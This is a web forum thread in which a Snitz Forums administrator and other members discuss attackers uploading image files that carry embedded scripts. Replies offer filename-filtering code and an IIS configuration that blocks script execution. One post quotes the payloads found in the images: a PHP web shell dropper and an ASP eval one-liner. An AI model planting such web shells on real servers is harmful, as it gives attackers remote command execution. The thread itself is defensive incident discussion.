| Author |
 Topic  |
|
|
spreadpoems
New Member
52 Posts |
 Posted - 14 January 2014 : 17:37:21
|
I have a directory where my registered users can upload images with .gif,.jpg and .png extensions on my forum. I'm using proeder's file attachment mod.
A hacker has been accessing my web server by uploading .gif's and .jpg's files to my user upload directory which is setup so that anyone has write permission.
I think he then changes the files to .asp and well it goes downhill from there...
My forum version is Snitz Forums 2000 v3.4.06 with a few of the security related features from .07 added. (Where is that list posted of the features updated in the newest version by the way?)
Is there a patch that I missed? This must have happened to someone before, any advice? I need to be able to check that the file is in fact an image before allowing the file to be uploaded.
It seems I'm suffering something similiar to this:
http://forum.snitz.com/Forum/topic.asp?TOPIC_ID=70002
Thanks
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
Carefree
Advanced Member
Philippines
4217 Posts |
Posted - 14 January 2014 : 19:53:58
|
I have my upload script checking the file names for a number of characters before allowing uploads. That precludes probably 99% of the silly behavior. Although, to retain complete control, it would probably be best to specify ALLOWED characters, rather than trying to
guess all the possibilities which will enable hacking.
Currently, I use this:
filename = Replace(filename, vbNullChar, "")
filename = Replace(filename, "!", "")
filename = Replace(filename, "#", "")
filename = Replace(filename, "@", "")
filename = Replace(filename, "$", "")
filename = Replace(filename, "%", "")
filename = Replace(filename, "^", "")
filename = Replace(filename, "&", "")
filename = Replace(filename, "*", "")
filename = Replace(filename, "(", "")
filename = Replace(filename, ")", "")
filename = Replace(filename, "=", "")
filename = Replace(filename, "+", "")
filename = Replace(filename, "}", "")
filename = Replace(filename, "[", "")
filename = Replace(filename, "]", "")
filename = Replace(filename, "{", "")
filename = Replace(filename, "|", "")
filename = Replace(filename, "\", "")
filename = Replace(filename, ";", "")
filename = Replace(filename, ":", "")
filename = Replace(filename, "/", "")
filename = Replace(filename, "?", "")
filename = Replace(filename, ">", "")
filename = Replace(filename, ",", "")
filename = Replace(filename, "<", "")
filename = Replace(filename, "'", "")
filename = Replace(filename, "~", "")
filename = Replace(filename, " ", "")
filename = Replace(filename, chr(160), "")
May change it to something like this:
For i = 1 to len(filename)
If inStr("abcdefghijklmnopqrstuvwxyz0123456789-_",lCase(mid(Filename,i,1)),1)=0 Then
Go_Result "Can not upload this file. File name not allowed."
End If
Next
|
Edited by - Carefree on 14 January 2014 20:17:53 |
 |
|
|
HuwR
Forum Admin
United Kingdom
20595 Posts |
|
|
Carefree
Advanced Member
Philippines
4217 Posts |
Posted - 15 January 2014 : 05:11:49
|
| I have that set, also. |
|
|
|
spreadpoems
New Member
52 Posts |
Posted - 15 January 2014 : 07:35:02
|
Guys, Thank you very much for your help.
I'm going to check the log files again to see what trick he was using to get those .asp files uploaded as jpg's. I don't recall seeing any extra dots or semicolons, but maybe I missed something or maybe he's using another trick.
I'll also check the permissions on the folder. I know I had to turn on Write permissions to allow images to be uploaded. If I recall one of the permissions is read and execute. I will need to research how to turn off scripts/executables.
One thing I did do which seemed to temporarily frustrate him is Using IIS Request Filtering, I set the directory to only allow requests for image extensions, however that didn't stop these files from being placed on the server.
I'll get back to you later in the day with what I find.
Thanks.
|
|
|
|
spreadpoems
New Member
52 Posts |
Posted - 15 January 2014 : 15:43:11
|
Ok, I removed permissions for script.
For those who don't know how in IIS7 here are instructions:
http://serverfault.com/questions/69920/where-is-the-execute-permissions-function-in-iis7
My web.config in the directory where uploads are allowed now looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="365.00:00:00" />
</staticContent>
<security>
<requestFiltering>
<fileExtensions allowUnlisted="false">
<add fileExtension=".jpeg" allowed="true" />
<add fileExtension=".jpg" allowed="true" />
<add fileExtension=".gif" allowed="true" />
<add fileExtension=".png" allowed="true" />
</fileExtensions>
<requestLimits maxQueryString="0" />
</requestFiltering>
</security>
<handlers accessPolicy="Read" />
</system.webServer>
</configuration>
Now, working on blocking the files from being uploaded in the first place. First I need to figure out how the hacker did it.
|
Edited by - spreadpoems on 15 January 2014 15:56:16 |
|
|
|
spreadpoems
New Member
52 Posts |
Posted - 15 January 2014 : 15:55:38
|
This is what my IsValidString function in outputFile.asp looks like
I don't know why the section checking for double spaces is commented out, but I have no reason to believe that's what the hacker used to get in.
Function IsValidString(sValidate)
Dim sInvalidChars
Dim bTemp
Dim i
' Disallowed characters
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'@"
for i = 1 To Len(sInvalidChars)
if InStr(sValidate, Mid(sInvalidChars, i, 1)) > 0 then bTemp = True
if bTemp then Exit For
next
for i = 1 to Len(sValidate)
if Asc(Mid(sValidate, i, 1)) = 160 then bTemp = True
if bTemp then Exit For
next
' extra checks
' no two consecutive dots or spaces
if not bTemp then
bTemp = InStr(sValidate, "..") > 0
end if
'### begin smoutc's fix
' if not bTemp then
' bTemp = InStr(sValidate, " ") > 0
' end if
'### end smoutc's fix
if not bTemp then
bTemp = (len(sValidate) <> len(Trim(sValidate)))
end if 'Addition for leading and trailing spaces
' if any of the above are true, invalid string
IsValidString = Not bTemp
End Function
Carefree, is your code supposed to replace this entire function?
For i = 1 to len(filename)
If inStr("abcdefghijklmnopqrstuvwxyz0123456789-_",lCase(mid(Filename,i,1)),1)=0 Then
Go_Result "Can not upload this file. File name not allowed."
End If
Next
Also, what is stopping someone from changing the extension of a .asp file to .jpg and then uploading it? |
|
|
|
Carefree
Advanced Member
Philippines
4217 Posts |
Posted - 15 January 2014 : 20:14:20
|
This would be the function:
quote:
Also, what is stopping someone from changing the extension of a .asp file to .jpg and then uploading it?
A file uploaded as a ".jpg" won't execute as an .asp file, regardless of whether the directory allows execution. It will try to display it as an image and you'd get either a bunch of gibberish or a message saying it cannot be displayed because it contains errors. |
|
|
|
spreadpoems
New Member
52 Posts |
Posted - 16 January 2014 : 00:56:16
|
I'm still in the middle of this but I just wanted to post this Interesting find:
Thanks to this post;
http://stackoverflow.com/questions/3499173/my-php-site-was-hacked-by-codes-uploaded-as-image
If I open the .gif uploaded by the hacker with notepad, there is text inside. Lots of gibberish and it ends with:
<?PHP fputs(fopen(¡¯shell.php¡¯,'w¡¯),¡¯<?php eval($_POST[cmd])?>¡¯);?>
the .jpg end with this
<%eval request("MH")%>
What should I be looking for in the log files? A request for a querystring "MH"?
quote:
A file uploaded as a ".jpg" won't execute as an .asp file, regardless of whether the directory allows execution. It will try to display it as an image and you'd get either a bunch of gibberish or a message saying it cannot be displayed because it contains errors.
If this is possible then there really is no way to prevent these files from being uploaded. The only recourse is to prevent them from being executed. |
Edited by - spreadpoems on 16 January 2014 00:57:33 |
|
|
|
HuwR
Forum Admin
United Kingdom
20595 Posts |
Posted - 16 January 2014 : 07:50:38
|
quote:
If this is possible then there really is no way to prevent these files from being uploaded. The only recourse is to prevent them from being executed.
Correct, which is why you should disable script execution in your image/upload folders, in fact any folder which you allow users to upload to should have script execution disabled |
MVC .net dev/test site | MVC .net running on Raspberry Pi |
|
|
| |
Topic |
|
|
|
